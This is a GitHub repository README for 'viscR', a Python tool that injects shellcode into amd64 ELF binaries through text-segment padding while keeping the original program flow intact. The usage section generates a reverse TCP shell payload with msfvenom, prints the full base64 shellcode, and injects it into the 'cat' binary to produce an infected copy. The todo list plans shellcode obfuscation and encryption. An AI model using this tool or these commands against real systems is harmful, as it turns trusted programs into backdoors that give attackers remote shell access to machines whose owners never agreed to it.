MSX646 / viscR

Binary file shellcode injector

Repository from Github https://github.comMSX646/viscRRepository from Github https://github.comMSX646/viscR

About

Binary file shellcode injector.
ELF injection based on Silvio Cesar Text Segment padding
Saves original binary execution flow

Installation

pip install -r requirements.txt

Usage

Works only with amd64 ELF bins, for now...
Example:

Usage: viscr.py <binary> <b64 encoded shellcode>
============
> msfvenom -p linux/x64/shell_reverse_tcp -f base64  LHOST=127.0.0.1 LPORT=4242
ailYmWoCX2oBXg8FSJdIuQIAEJJ/AAABUUiJ5moQWmoqWA8FagNeSP/OaiFYDwV19mo7WJlIuy9iaW4vc2gAU0iJ51JXSInmDwU=
============
> ./viscR.py cat ailYmWoCX2oBXg8FSJdIuQIAEJJ/AAABUUiJ5moQWmoqWA8FagNeSP/OaiFYDwV19mo7WJlIuy9iaW4vc2gAU0iJ51JXSInmDwU=
Using user supplied shellcode
Arch === amd64
Endian === little
Found cave at 0x7049 ; size - 16457
cat_infctd created. Use wisely

Todo

  • PE, Mach-O support
  • ARM64 support
  • Shellcode encoding/ubfuscation/encryption
  • etc. etc. etc.

About

Binary file shellcode injector


Languages

Language:Python 96.5%Language:Shell 3.5%